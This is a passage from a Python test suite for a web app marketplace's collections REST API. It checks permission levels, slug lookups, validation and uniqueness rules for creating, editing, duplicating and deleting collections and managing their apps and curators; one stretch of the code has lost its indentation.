        self.assertApiUrlEqual(data['image'],
            '/rocketfuel/collections/%s/image.png?bbbbbb' % self.collection.pk,
            scheme='https', netloc='testserver-cdn')
    def test_detail_slug(self):
        self.detail(self.client, collection_id=self.collection.slug)
    def test_detail_slug_anon(self):
        self.detail(self.anon, collection_id=self.collection.slug)
    def test_detail_no_perms(self):
        self.detail(self.client)
    def test_detail_has_perms(self):
        self.make_publisher()
        self.detail(self.client)
    def test_detail_curator(self):
        self.make_curator()
        self.detail(self.client)
class TestCollectionViewSetCreate(BaseCollectionViewSetTest):
    """
    Tests the handling of POST requests to the list endpoint of
    CollectionViewSet.
    """
    def create(self, client):
        """
        POST self.collection_data as JSON with `client`; return
        (response, decoded JSON body).
        """
        res = client.post(self.list_url, json.dumps(self.collection_data))
        data = json.loads(res.content)
        return res, data

    def test_create_anon(self):
        res, data = self.create(self.anon)
        eq_(res.status_code, 403)

    def test_create_no_perms(self):
        res, data = self.create(self.client)
        eq_(res.status_code, 403)

    def test_create_curator(self):
        # Being a curator of an existing collection does not grant the right
        # to create new ones. Bug fix: the original wrote `self.make_curator`
        # without the call parentheses, so the curator role was never granted
        # and the test only re-checked the plain-user case.
        self.make_curator()
        res, data = self.create(self.client)
        eq_(res.status_code, 403)

    def test_create_has_perms(self):
        self.make_publisher()
        res, data = self.create(self.client)
        eq_(res.status_code, 201)
        new_collection = Collection.objects.get(pk=data['id'])
        ok_(new_collection.pk != self.collection.pk)
        # The slug from collection_data already exists (self.collection), so
        # the new collection gets a -1 suffix.
        self.collection_data['slug'] = u'my-favourite-gamés-1'
        # Verify that the collection metadata is correct.
        keys = self.collection_data.keys()
        keys.remove('name')
        keys.remove('description')
        for field in keys:
            eq_(data[field], self.collection_data[field])
            eq_(getattr(new_collection, field), self.collection_data[field])
        # Test name and description separately as we return the whole dict
        # with all translations. Bug fix: the original compared data['name']
        # (and data['description']) against itself, asserting nothing; the
        # expected values live in self.collection_data, mirroring
        # TestCollectionViewSetDuplicate.test_duplicate_has_perms.
        eq_(data['name'], self.collection_data['name'])
        eq_(new_collection.name, data['name']['en-US'])
        eq_(data['description'], self.collection_data['description'])
        eq_(new_collection.description, data['description']['en-US'])

    def test_create_validation_operatorshelf_category(self):
        # Operator-shelf collections may not carry a category.
        self.category = Category.objects.create(type=amo.ADDON_WEBAPP,
            name='Grumpy', slug='grumpy-cat')
        self.make_publisher()
        self.collection_data.update({
            'category': self.category.pk,
            'collection_type': COLLECTIONS_TYPE_OPERATOR
        })
        res, data = self.create(self.client)
        ok_(res.status_code, 400)
        ok_('non_field_errors' in data.keys())

    def test_create_empty_description_dict_in_default_language(self):
        """
        Test that we can't have an empty Translation for the default_language.
        """
        # See bug https://bugzilla.mozilla.org/show_bug.cgi?id=915652
        raise SkipTest
        self.make_publisher()
        self.collection_data = {
            'collection_type': COLLECTIONS_TYPE_BASIC,
            'name': 'whatever',
            'description': {'en-US': ' ', 'fr': 'lol'},
        }
        res, data = self.create(self.client)
        # The description dict is not empty, but it contains an empty
        # translation for en-US, which is incorrect since it's the default
        # language (it'll save ok, but then fail when reloading).
        # It could work if translation system wasn't insisting on
        # loading only the default+current language...
        eq_(res.status_code, 400)
        ok_('description' in data)

    def test_create_no_colors(self):
        # Empty color strings are accepted.
        self.collection_data['background_color'] = ''
        self.collection_data['text_color'] = ''
        self.test_create_has_perms()

    def test_create_has_perms_no_type(self):
        # collection_type is mandatory.
        self.make_publisher()
        self.collection_data.pop('collection_type')
        res, data = self.create(self.client)
        eq_(res.status_code, 400)

    def test_create_has_perms_no_slug(self):
        # A missing slug is generated from the (default-language) name.
        self.make_publisher()
        self.collection_data.pop('slug')
        res, data = self.create(self.client)
        eq_(res.status_code, 201)
        eq_(data['slug'], slugify(self.collection_data['name']['en-US']))

    def test_create_collection_no_author(self):
        # author is optional and defaults to the empty string.
        self.make_publisher()
        self.collection_data.pop('author')
        res, data = self.create(self.client)
        eq_(res.status_code, 201)
        new_collection = Collection.objects.get(pk=data['id'])
        ok_(new_collection.pk != self.collection.pk)
        eq_(new_collection.author, '')

    def test_create_featured_duplicate(self):
        """
        Featured Apps & Operator Shelf should not have duplicates for a
        region / carrier / category combination. Make sure this is respected
        when creating a new collection.
        """
        self.setup_unique()
        self.collection_data['category'] = self.collection_data['category'].pk
        res, data = self.create(self.client)
        eq_(res.status_code, 400)
        ok_('collection_uniqueness' in data)

    def test_create_featured_duplicate_different_category(self):
        """
        Try to create a new collection with the duplicate data from our
        featured collection, this time changing the category.
        """
        self.setup_unique()
        nyan = Category.objects.create(type=amo.ADDON_WEBAPP, name='Nyan Cat',
                                       slug='nyan-cat')
        self.collection_data['category'] = nyan.pk
        res, data = self.create(self.client)
        eq_(res.status_code, 201)
class TestCollectionViewSetDelete(BaseCollectionViewSetTest):
    """
    Tests the handling of DELETE requests to a single collection on
    CollectionViewSet.
    """
    def delete(self, client, collection_id=None):
        # Shared helper: DELETE the collection (by pk, or slug when given).
        # A successful delete is a 204 with no body, hence the content guard.
        url = self.collection_url('detail',
                                  collection_id or self.collection.pk)
        res = client.delete(url)
        data = json.loads(res.content) if res.content else None
        return res, data
    def test_delete_anon(self):
        res, data = self.delete(self.anon)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_delete_no_perms(self):
        res, data = self.delete(self.client)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_delete_curator(self):
        # Curators may edit but not delete collections: still 403.
        self.make_curator()
        res, data = self.delete(self.client)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_delete_has_perms(self):
        self.make_publisher()
        res, data = self.delete(self.client)
        eq_(res.status_code, 204)
        ok_(not data)
    def test_delete_slug(self):
        self.make_publisher()
        res, data = self.delete(self.client,
                                collection_id=self.collection.slug)
        eq_(res.status_code, 204)
        ok_(not data)
    def test_delete_nonexistent(self):
        self.make_publisher()
        res, data = self.delete(self.client, collection_id=100000)
        eq_(res.status_code, 404)
class TestCollectionViewSetDuplicate(BaseCollectionViewSetTest):
    """
    Tests the `duplicate` action on CollectionViewSet.
    """
    def duplicate(self, client, data=None, collection_id=None):
        # Shared helper: POST to the `duplicate` action, optionally passing
        # `data` overrides for fields of the new collection.
        if not data:
            data = {}
        url = self.collection_url('duplicate',
                                  collection_id or self.collection.pk)
        res = client.post(url, json.dumps(data))
        data = json.loads(res.content)
        return res, data
    def test_duplicate_anon(self):
        res, data = self.duplicate(self.anon)
        eq_(res.status_code, 403)
    def test_duplicate_no_perms(self):
        res, data = self.duplicate(self.client)
        eq_(res.status_code, 403)
    def test_duplicate_curator(self):
        # Unlike create/delete, curators are allowed to duplicate.
        self.make_curator()
        res, data = self.duplicate(self.client)
        eq_(res.status_code, 201)
    def test_duplicate_has_perms(self):
        self.make_publisher()
        original = self.collection
        res, data = self.duplicate(self.client)
        eq_(res.status_code, 201)
        new_collection = Collection.objects.get(pk=data['id'])
        ok_(new_collection.pk != original.pk)
        # The duplicate gets a fresh, distinct slug.
        ok_(new_collection.slug)
        ok_(new_collection.slug != original.slug)
        # Verify that the collection metadata is correct. We duplicated
        # self.collection, which was created with self.collection_data, so
        # use that.
        # NOTE(review): `original` was already bound to self.collection
        # above; this reassignment is redundant.
        original = self.collection
        keys = self.collection_data.keys()
        keys.remove('name')
        keys.remove('description')
        keys.remove('slug')
        for field in keys:
            eq_(data[field], self.collection_data[field])
            eq_(getattr(new_collection, field), self.collection_data[field])
            eq_(getattr(new_collection, field), getattr(original, field))
        # Test name and description separately as we return the whole dict
        # with all translations.
        eq_(data['name'], self.collection_data['name'])
        eq_(new_collection.name, data['name']['en-US'])
        eq_(new_collection.name, original.name)
        eq_(data['description'], self.collection_data['description'])
        eq_(new_collection.description, data['description']['en-US'])
        eq_(new_collection.description, original.description)
    def test_duplicate_slug(self):
        self.make_publisher()
        res, data = self.duplicate(self.client,
                                   collection_id=self.collection.slug)
        eq_(res.status_code, 201)
    def test_duplicate_apps(self):
        # Duplicating a collection copies its app membership and ordering.
        self.make_publisher()
        self.create_apps(number=2)
        self.add_apps_to_collection(*self.apps)
        res, data = self.duplicate(self.client)
        eq_(res.status_code, 201)
        new_collection = Collection.objects.get(pk=data['id'])
        ok_(new_collection.pk != self.collection.pk)
        eq_(list(new_collection.apps()), list(self.collection.apps()))
        eq_(len(data['apps']), len(self.apps))
        for order, app in enumerate(self.apps):
            eq_(int(data['apps'][order]['id']), self.apps[order].pk)
    def test_duplicate_override(self):
        # Fields passed in the request body override the copied values.
        self.make_publisher()
        override_data = {
            'collection_type': COLLECTIONS_TYPE_OPERATOR,
            'region': mkt.regions.SPAIN.id
        }
        res, data = self.duplicate(self.client, override_data)
        eq_(res.status_code, 201)
        new_collection = Collection.objects.get(pk=data['id'])
        ok_(new_collection.pk != self.collection.pk)
        for key in override_data:
            eq_(getattr(new_collection, key), override_data[key])
            ok_(getattr(new_collection, key) != getattr(self.collection, key))
        # We return slugs always in data, so test that separately.
        expected_data = {
            'collection_type': COLLECTIONS_TYPE_OPERATOR,
            'region': mkt.regions.SPAIN.slug
        }
        for key in expected_data:
            eq_(data[key], expected_data[key])
    def test_duplicate_invalid_data(self):
        # An out-of-range region id must be rejected with a 400.
        self.make_publisher()
        override_data = {
            'collection_type': COLLECTIONS_TYPE_OPERATOR,
            'region': max(mkt.regions.REGION_IDS) + 1
        }
        res, data = self.duplicate(self.client, override_data)
        eq_(res.status_code, 400)
    def test_duplicate_featured(self):
        # Duplicating a featured collection would violate the uniqueness
        # constraint on region/carrier/category.
        self.setup_unique()
        res, data = self.duplicate(self.client)
        eq_(res.status_code, 400)
        ok_('collection_uniqueness' in data)
    def test_duplicate_operator(self):
        # Same uniqueness rule applies to operator-shelf collections.
        self.setup_unique()
        self.collection.update(collection_type=COLLECTIONS_TYPE_OPERATOR,
                               carrier=None, category=None)
        res, data = self.duplicate(self.client)
        eq_(res.status_code, 400)
        ok_('collection_uniqueness' in data)
class CollectionViewSetChangeAppsMixin(BaseCollectionViewSetTest):
    """
    Mixin containing common methods to actions that modify the apps belonging
    to a collection.
    """
    def add_app(self, client, app_id=None, collection_id=None):
        # POST to the `add-app` action. With app_id=None a fresh app is
        # created and used; passing a falsy app_id (e.g. False) deliberately
        # sends an empty payload to exercise the "app not provided" error.
        if app_id is None:
            self.create_apps()
            app_id = self.apps[0].pk
        form_data = {'app': app_id} if app_id else {}
        url = self.collection_url('add-app',
                                  collection_id or self.collection.pk)
        res = client.post(url, json.dumps(form_data))
        data = json.loads(res.content)
        return res, data
    def remove_app(self, client, app_id=None, collection_id=None):
        # POST to the `remove-app` action. Mirrors add_app(), but creates two
        # apps by default; a body-less response (e.g. 205) yields data=None.
        if app_id is None:
            self.create_apps(number=2)
            app_id = self.apps[0].pk
        form_data = {'app': app_id} if app_id else {}
        url = self.collection_url('remove-app',
                                  collection_id or self.collection.pk)
        remove_res = client.post(url, json.dumps(form_data))
        remove_data = (json.loads(remove_res.content)
                       if remove_res.content else None)
        return remove_res, remove_data
    def reorder(self, client, order=None, collection_id=None):
        # POST a list of app pks to the `reorder` action; `order` defaults to
        # an empty payload.
        if order is None:
            order = {}
        url = self.collection_url('reorder',
                                  collection_id or self.collection.pk)
        res = client.post(url, json.dumps(order))
        data = json.loads(res.content)
        return res, data
class TestCollectionViewSetAddApp(CollectionViewSetChangeAppsMixin):
    """
    Tests the `add-app` action on CollectionViewSet.
    """
    def test_add_app_anon(self):
        res, data = self.add_app(self.anon)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_add_app_no_perms(self):
        res, data = self.add_app(self.client)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_add_app_has_perms(self):
        eq_(list(self.collection.apps()), [])
        self.make_publisher()
        res, data = self.add_app(self.client)
        eq_(res.status_code, 200)
        eq_(list(self.collection.apps()), [self.apps[0]])
    def test_add_app_slug(self):
        # The collection can also be addressed by slug instead of pk.
        eq_(list(self.collection.apps()), [])
        self.make_publisher()
        res, data = self.add_app(self.client,
                                 collection_id=self.collection.slug)
        eq_(res.status_code, 200)
        eq_(list(self.collection.apps()), [self.apps[0]])
    def test_add_app_curator(self):
        # Curators of the collection may add apps to it.
        eq_(list(self.collection.apps()), [])
        self.make_curator()
        res, data = self.add_app(self.client)
        eq_(res.status_code, 200)
        eq_(list(self.collection.apps()), [self.apps[0]])
    def test_add_app_nonexistent(self):
        self.make_publisher()
        res, data = self.add_app(self.client, app_id=100000)
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['doesnt_exist'], data['detail'])
    def test_add_app_empty(self):
        # app_id=False makes add_app() send an empty payload.
        self.make_publisher()
        res, data = self.add_app(self.client, app_id=False)
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['not_provided'], data['detail'])
    def test_add_app_duplicate(self):
        # Adding the same app twice is rejected.
        self.make_publisher()
        self.add_app(self.client)
        res, data = self.add_app(self.client)
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['already_in'], data['detail'])
class TestCollectionViewSetRemoveApp(CollectionViewSetChangeAppsMixin):
    """
    Tests the `remove-app` action on CollectionViewSet.
    """
    def test_remove_app_anon(self):
        res, data = self.remove_app(self.anon)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_remove_app_no_perms(self):
        res, data = self.remove_app(self.client)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_remove_app_has_perms(self):
        self.make_publisher()
        self.add_app(self.client)
        res, data = self.remove_app(self.client)
        eq_(res.status_code, 200)
        eq_(len(data['apps']), 0)
    def test_remove_app_slug(self):
        # The collection can also be addressed by slug instead of pk.
        self.make_publisher()
        self.add_app(self.client)
        res, data = self.remove_app(self.client,
                                    collection_id=self.collection.slug)
        eq_(res.status_code, 200)
        eq_(len(data['apps']), 0)
    def test_remove_app_curator(self):
        # Curators of the collection may remove apps from it.
        self.make_curator()
        self.add_app(self.client)
        res, data = self.remove_app(self.client)
        eq_(res.status_code, 200)
        eq_(len(data['apps']), 0)
    def test_remove_app_nonexistent(self):
        self.make_publisher()
        res, data = self.remove_app(self.client, app_id=100000)
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['doesnt_exist'], data['detail'])
    def test_remove_app_empty(self):
        # app_id=False makes remove_app() send an empty payload.
        self.make_publisher()
        res, data = self.remove_app(self.client, app_id=False)
        eq_(res.status_code, 400)
        eq_(CollectionViewSet.exceptions['not_provided'], data['detail'])
    def test_remove_app_invalid(self):
        # Removing an app that exists but is not in the collection returns a
        # 205 (Reset Content) with an empty body.
        self.make_publisher()
        self.create_apps(number=2)
        self.add_app(self.client, app_id=self.apps[0].pk)
        res, data = self.remove_app(self.client, app_id=self.apps[1].pk)
        eq_(res.status_code, 205)
        ok_(not data)
class TestCollectionViewSetReorderApps(CollectionViewSetChangeAppsMixin):
    """
    Tests the `reorder` action on CollectionViewSet.
    """
    def random_app_order(self):
        # Return the pks of self.apps, shuffled, to use as a reorder payload.
        apps = list(a.pk for a in self.apps)
        shuffle(apps)
        return apps
    def test_reorder_anon(self):
        res, data = self.reorder(self.anon)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_reorder_no_perms(self):
        res, data = self.reorder(self.client)
        eq_(res.status_code, 403)
        eq_(PermissionDenied.default_detail, data['detail'])
    def test_reorder_has_perms(self):
        self.make_publisher()
        self.create_apps()
        self.add_apps_to_collection(*self.apps)
        new_order = self.random_app_order()
        res, data = self.reorder(self.client, order=new_order)
        eq_(res.status_code, 200)
        # The response lists the apps in the requested order.
        for order, app in enumerate(data['apps']):
            app_pk = new_order[order]
            eq_(Webapp.objects.get(pk=app_pk).app_slug, app['slug'])
    def test_reorder_slug(self):
        # The collection can also be addressed by slug instead of pk.
        self.make_publisher()
        self.create_apps()
        self.add_apps_to_collection(*self.apps)
        new_order = self.random_app_order()
        res, data = self.reorder(self.client, order=new_order,
                                 collection_id=self.collection.slug)
        eq_(res.status_code, 200)
        for order, app in enumerate(data['apps']):
            app_pk = new_order[order]
            eq_(Webapp.objects.get(pk=app_pk).app_slug, app['slug'])
    def test_reorder_curator(self):
        # Curators of the collection may reorder its apps.
        self.make_curator()
        self.create_apps()
        self.add_apps_to_collection(*self.apps)
        new_order = self.random_app_order()
        res, data = self.reorder(self.client, order=new_order)
        eq_(res.status_code, 200)
        for order, app in enumerate(data['apps']):
            app_pk = new_order[order]
            eq_(Webapp.objects.get(pk=app_pk).app_slug, app['slug'])
    def test_reorder_missing_apps(self):
        # A payload that does not cover every app in the collection is
        # rejected; the error echoes the expected set of pks.
        self.make_publisher()
        self.create_apps()
        self.add_apps_to_collection(*self.apps)
        new_order = self.random_app_order()
        new_order.pop()
        res, data = self.reorder(self.client, order=new_order)
        eq_(res.status_code, 400)
        eq_(data['detail'], CollectionViewSet.exceptions['app_mismatch'])
        self.assertSetEqual(data['apps'],
                            [a.pk for a in self.collection.apps()])
class TestCollectionViewSetEditCollection(BaseCollectionViewSetTest):
"""
Tests the handling of PATCH requests to a single collection on
CollectionViewSet.
"""
def edit_collection(self, client, collection_id=None, **kwargs):
url = self.collection_url('detail',
collection_id or self.collection.pk)
res = client.patch(url, json.dumps(kwargs))
data = json.loads(res.content)
return res, data
def test_edit_collection_anon(self):
res, data = self.edit_collection(self.anon)
eq_(res.status_code, 403)
eq_(PermissionDenied.default_detail, data['detail'])
def test_edit_collection_name_and_description_simple(self):
self.make_publisher()
updates = {
'description': u'¿Dónde está la biblioteca?',
'name': u'Allö',
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection.reload()
for key, value in updates.iteritems():
eq_(data[key], {'en-US': value})
eq_(getattr(self.collection, key), value)
def test_edit_collection_name_and_description_slug(self):
self.make_publisher()
updates = {
'description': u'¿Dónde está la biblioteca?',
'name': u'Allö',
}
res, data = self.edit_collection(self.client,
collection_id=self.collection.slug,
**updates)
eq_(res.status_code, 200)
self.collection.reload()
for key, value in updates.iteritems():
eq_(data[key], {'en-US': value})
eq_(getattr(self.collection, key), value)
def test_edit_collection_name_and_description_curator(self):
self.make_curator()
updates = {
'description': u'¿Dónde está la biblioteca?',
'name': u'Allö',
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection.reload()
for key, value in updates.iteritems():
eq_(data[key], {'en-US': value})
eq_(getattr(self.collection, key), value)
def test_edit_collection_name_and_description_multiple_translations(self):
self.make_publisher()
updates = {
'name': {
'en-US': u'Basta the potato',
'fr': u'Basta la pomme de terre',
'es': u'Basta la pâtätà',
'it': u'Basta la patata'
},
'description': {
'en-US': 'Basta likes potatoes and Le Boulanger',
'fr': 'Basta aime les patates et Le Boulanger',
'es': 'Basta gusta las patatas y Le Boulanger',
'it': 'Basta ama patate e Le Boulanger'
}
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection = Collection.objects.get(pk=self.collection.pk)
for key, value in updates.iteritems():
eq_(getattr(self.collection, key), updates[key]['en-US'])
with translation.override('es'):
collection_in_es = Collection.objects.get(pk=self.collection.pk)
eq_(getattr(collection_in_es, key), updates[key]['es'])
with translation.override('fr'):
collection_in_fr = Collection.objects.get(pk=self.collection.pk)
eq_(getattr(collection_in_fr, key), updates[key]['fr'])
def test_edit_collection_name_strip(self):
self.make_publisher()
updates = {
'name': {
'en-US': u' New Nâme! '
},
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 200)
self.collection = Collection.objects.get(pk=self.collection.pk)
eq_(data['name'], {u'en-US': u'New Nâme!'})
eq_(self.collection.name, u'New Nâme!')
    def test_edit_collection_has_perms(self):
        """A publisher may edit every editable field in a single PATCH."""
        self.make_publisher()
        cat = Category.objects.create(type=amo.ADDON_WEBAPP, name='Grumpy',
                                      slug='grumpy-cat')
        updates = {
            'author': u'Nöt Me!',
            'region': mkt.regions.SPAIN.id,
            'is_public': False,
            'name': {'en-US': u'clôuserw soundboard'},
            'description': {'en-US': u'Gèt off my lawn!'},
            'category': cat.pk,
            'carrier': mkt.carriers.TELEFONICA.id,
        }
        res, data = self.edit_collection(self.client, **updates)
        eq_(res.status_code, 200)
        collection = self.collection.reload()
        # Test that the result and object contain the right values. We can't
        # easily loop on updates dict because data is stored and serialized
        # in different ways depending on the field.
        eq_(data['author'], updates['author'])
        eq_(collection.author, updates['author'])
        eq_(data['is_public'], updates['is_public'])
        eq_(collection.is_public, updates['is_public'])
        eq_(data['name'], updates['name'])
        eq_(collection.name, updates['name']['en-US'])
        eq_(data['description'], updates['description'])
        eq_(collection.description, updates['description']['en-US'])
        # category/region/carrier are serialized as slugs but stored as
        # pk / id values on the model.
        eq_(data['category'], cat.slug)
        eq_(collection.category, cat)
        eq_(data['region'], mkt.regions.SPAIN.slug)
        eq_(collection.region, updates['region'])
        eq_(data['carrier'], mkt.carriers.TELEFONICA.slug)
        eq_(collection.carrier, updates['carrier'])
    def test_edit_collection_with_slugs(self):
        """Region/category/carrier may be passed as slugs instead of ids."""
        self.make_publisher()
        cat = Category.objects.create(type=amo.ADDON_WEBAPP, name='Grumpy',
                                      slug='grumpy-cat')
        updates = {
            'region': mkt.regions.SPAIN.slug,
            'category': cat.slug,
            'carrier': mkt.carriers.TELEFONICA.slug,
        }
        res, data = self.edit_collection(self.client, **updates)
        eq_(res.status_code, 200)
        collection = self.collection.reload()
        # Test that the result and object contain the right values. We can't
        # easily loop on updates dict because data is stored and serialized
        # in different ways depending on the field.
        # Serialized form keeps slugs; the model stores numeric ids / FK.
        eq_(data['region'], mkt.regions.SPAIN.slug)
        eq_(collection.region, mkt.regions.SPAIN.id)
        eq_(data['carrier'], mkt.carriers.TELEFONICA.slug)
        eq_(collection.carrier, mkt.carriers.TELEFONICA.id)
        eq_(data['category'], cat.slug)
        eq_(collection.category, cat)
def test_edit_collection_invalid_carrier_slug(self):
self.make_publisher()
# Invalid carrier slug.
updates = {'carrier': 'whateverlol'}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_carrier(self):
self.make_publisher()
# Invalid carrier id.
updates = {'carrier': 1576}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
    def test_edit_collection_null_values(self):
        """Explicit None clears carrier/region/category on the collection."""
        self.make_publisher()
        cat = Category.objects.create(type=amo.ADDON_WEBAPP, name='Grumpy',
                                      slug='grumpy-cat')
        # Start from a collection that has all three fields populated.
        self.collection.update(**{
            'carrier': mkt.carriers.UNKNOWN_CARRIER.id,
            'region': mkt.regions.SPAIN.id,
            'category': cat,
        })
        updates = {
            'carrier': None,
            'region': None,
            'category': None,
        }
        res, data = self.edit_collection(self.client, **updates)
        eq_(res.status_code, 200)
        self.collection.reload()
        for key, value in updates.iteritems():
            eq_(data[key], value)
            eq_(getattr(self.collection, key), value)
    def test_edit_collection_invalid_region_0(self):
        # 0 is an invalid region. Unfortunately, because django bug #18724 is
        # fixed in django 1.5 but not 1.4, '0' values are accepted.
        # Unskip this test when using django 1.5.
        # NOTE: the body below the SkipTest is intentionally unreachable
        # until the skip is removed.
        raise SkipTest('Test that needs django 1.5 to pass')
        self.make_publisher()
        updates = {'region': 0}
        res, data = self.edit_collection(self.client, **updates)
        eq_(res.status_code, 400)
def test_edit_collection_invalid_region(self):
self.make_publisher()
# Invalid region id.
updates = {'region': max(mkt.regions.REGION_IDS) + 1}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_region_slug(self):
self.make_publisher()
# Invalid region slug.
updates = {'region': 'idontexist'}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_category(self):
self.make_publisher()
eq_(Category.objects.count(), 0)
# Invalid (non-existant) category.
updates = {'category': 1}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
def test_edit_collection_invalid_category_slug(self):
self.make_publisher()
eq_(Category.objects.count(), 0)
# Invalid (non-existant) category slug.
updates = {'category': 'nosuchcat'}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
    def test_edit_collection_featured_duplicate(self):
        """
        Featured Apps & Operator Shelf should not have duplicates for a
        region / carrier / category combination. Make sure this is respected
        when editing a collection.
        """
        self.setup_unique()
        # Create a second collection occupying a distinct region/carrier.
        self.collection_data.update({
            'region': mkt.regions.US.id,
            'carrier': mkt.carriers.SPRINT.id
        })
        extra_collection = Collection.objects.create(**self.collection_data)
        # Try to edit self.collection with the data from our extra_collection.
        update_data = {
            'region': extra_collection.region,
            'carrier': extra_collection.carrier,
        }
        res, data = self.edit_collection(self.client, **update_data)
        eq_(res.status_code, 400)
        ok_('collection_uniqueness' in data)
        # Changing the collection type should be enough to make it work.
        update_data['collection_type'] = COLLECTIONS_TYPE_BASIC
        res, data = self.edit_collection(self.client, **update_data)
        eq_(res.status_code, 200)
        # A dumb change to see if you can still edit afterwards. The uniqueness
        # check should exclude the current instance and allow it, obviously.
        update_data = {'is_public': False}
        res, data = self.edit_collection(self.client, **update_data)
        eq_(res.status_code, 200)
    def test_edit_collection_operator_shelf_duplicate(self):
        """
        Featured Apps & Operator Shelf should not have duplicates for a
        region / carrier / category combination. Make sure this is respected
        when editing a collection.
        """
        self.setup_unique()
        # Turn self.collection into an operator shelf (no category allowed).
        self.collection.update(category=None,
                               collection_type=COLLECTIONS_TYPE_OPERATOR)
        # Create a second operator shelf on a different carrier.
        self.collection_data.update({
            'category': None,
            'collection_type': COLLECTIONS_TYPE_OPERATOR,
            'carrier': mkt.carriers.VIMPELCOM.id,
        })
        extra_collection = Collection.objects.create(**self.collection_data)
        # Try to edit self.collection with the data from our extra_collection.
        update_data = {'carrier': extra_collection.carrier}
        res, data = self.edit_collection(self.client, **update_data)
        eq_(res.status_code, 400)
        ok_('collection_uniqueness' in data)
        # Changing the carrier should be enough to make it work.
        update_data['carrier'] = mkt.carriers.SPRINT.id
        res, data = self.edit_collection(self.client, **update_data)
        eq_(res.status_code, 200)
        # A dumb change to see if you can still edit afterwards. The uniqueness
        # check should exclude the current instance and allow it, obviously.
        update_data = {'is_public': False}
        res, data = self.edit_collection(self.client, **update_data)
        eq_(res.status_code, 200)
def test_edit_collection_validation_operatorshelf_category(self):
self.make_publisher()
category = Category.objects.create(type=amo.ADDON_WEBAPP,
name='Grumpy', slug='grumpy-cat')
updates = {
'category': category.pk,
'collection_type': COLLECTIONS_TYPE_OPERATOR
}
res, data = self.edit_collection(self.client, **updates)
eq_(res.status_code, 400)
ok_('non_field_errors' in data)
class TestCollectionViewSetListCurators(BaseCollectionViewSetTest):
    """
    Tests the `curators` action on CollectionViewSet.
    """
    def list_curators(self, client, collection_id=None):
        """GET the curator list after first adding user2 as a curator."""
        self.collection.add_curator(self.user2)
        url = self.collection_url('curators',
                                  collection_id or self.collection.pk)
        response = client.get(url)
        return response, json.loads(response.content)
    def test_list_curators_no_perms(self):
        """Without curate permission, listing curators is forbidden."""
        response, body = self.list_curators(self.client)
        eq_(response.status_code, 403)
        eq_(PermissionDenied.default_detail, body['detail'])
    def test_list_curators_has_perms(self):
        """A publisher sees the single curator (user2)."""
        self.make_publisher()
        response, body = self.list_curators(self.client)
        eq_(response.status_code, 200)
        eq_(len(body), 1)
        eq_(body[0]['id'], self.user2.pk)
    def test_list_curators_slug(self):
        """The endpoint also resolves the collection by slug."""
        self.make_publisher()
        response, body = self.list_curators(
            self.client, collection_id=self.collection.slug)
        eq_(response.status_code, 200)
        eq_(len(body), 1)
        eq_(body[0]['id'], self.user2.pk)
    def test_list_curators_as_curator(self):
        """A curator can list curators; both curators are returned."""
        self.make_curator()
        response, body = self.list_curators(self.client)
        eq_(response.status_code, 200)
        eq_(len(body), 2)
        for entry in body:
            ok_(entry['id'] in [self.user.pk, self.user2.pk])
class TestCollectionViewSetAddCurator(BaseCollectionViewSetTest):
    """
    Tests the `add-curator` action on CollectionViewSet.
    """
    def add_curator(self, client, collection_id=None, user_id=None):
        """POST to add-curator; defaults to adding self.user by pk.

        Pass user_id=False to send a payload with no `user` key at all.
        """
        if user_id is None:
            user_id = self.user.pk
        payload = {'user': user_id} if user_id else {}
        url = self.collection_url('add-curator',
                                  collection_id or self.collection.pk)
        response = client.post(url, json.dumps(payload))
        return response, json.loads(response.content)
    def test_add_curator_anon(self):
        """Anonymous clients may not add curators."""
        response, body = self.add_curator(self.anon)
        eq_(response.status_code, 403)
        eq_(PermissionDenied.default_detail, body['detail'])
    def test_add_curator_no_perms(self):
        """Clients without curate permission may not add curators."""
        response, body = self.add_curator(self.client)
        eq_(response.status_code, 403)
        eq_(PermissionDenied.default_detail, body['detail'])
    def test_add_curator_has_perms(self):
        """A publisher may add a curator."""
        self.make_publisher()
        response, body = self.add_curator(self.client)
        eq_(response.status_code, 200)
        eq_(body[0]['id'], self.user.pk)
    def test_add_curator_slug(self):
        """The endpoint also resolves the collection by slug."""
        self.make_publisher()
        response, body = self.add_curator(
            self.client, collection_id=self.collection.slug)
        eq_(response.status_code, 200)
        eq_(body[0]['id'], self.user.pk)
    def test_add_curator_multiple_cache(self):
        """Adding a second curator returns both (no stale cached list)."""
        self.make_publisher()
        self.add_curator(self.client)
        response, body = self.add_curator(self.client, user_id=self.user2.pk)
        self.assertSetEqual([entry['id'] for entry in body],
                            [self.user.pk, self.user2.pk])
    def test_add_curator_as_curator(self):
        """An existing curator may add further curators."""
        self.make_curator()
        response, body = self.add_curator(self.client)
        eq_(response.status_code, 200)
        eq_(body[0]['id'], self.user.pk)
    def test_add_curator_nonexistent(self):
        """An unknown pk or email yields a 400 with a specific message."""
        self.make_publisher()
        response, body = self.add_curator(self.client, user_id=100000)
